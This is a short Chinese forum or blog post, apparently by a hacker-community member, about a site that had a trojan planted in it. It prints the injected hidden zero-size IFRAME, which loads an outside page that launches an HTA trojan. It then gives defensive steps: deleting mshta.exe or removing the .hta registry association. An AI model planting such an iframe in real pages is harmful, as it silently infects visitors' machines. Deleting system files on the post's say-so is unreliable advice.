扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
让人挂马了,真是郁闷~
木马代码如下
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
<IFRAME marginWidth=0 marginHeight=0 src="http://www.cnbct.be/hack/joke.htm" frameBorder=0 width=0 scrolling=no height=0></IFRAME>
是hta自动弹出的木马,
我查看他的木马页面里windows.htm里
代码内容加了一些空格,基本可以躲避过杀毒软件的查杀
对于没有对付木马经验的人,机器已经中标了...
身为黑基的人,我badwolf需要为黑基地人做点事~
好开始这里介绍1下用1个简单的方法彻底禁止他木马在你机器运行
看这个
C:/WINDOWS/system32/mshta.exe
这个是运行*.hta文件的exe文件
1是删除这个exe文件
或者进入注册表
搜索.hta 然后把相对应的注册表导出
然后删除他
也就删除了*.hta扩展名文件与mshta.exe的注册表关联
所以当打开挂马页面,也只会下载个*.hta文件并不会运行
也就不会中木马了..
其他格式的木马也差不多例如*.wmf的也用同样方法。
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者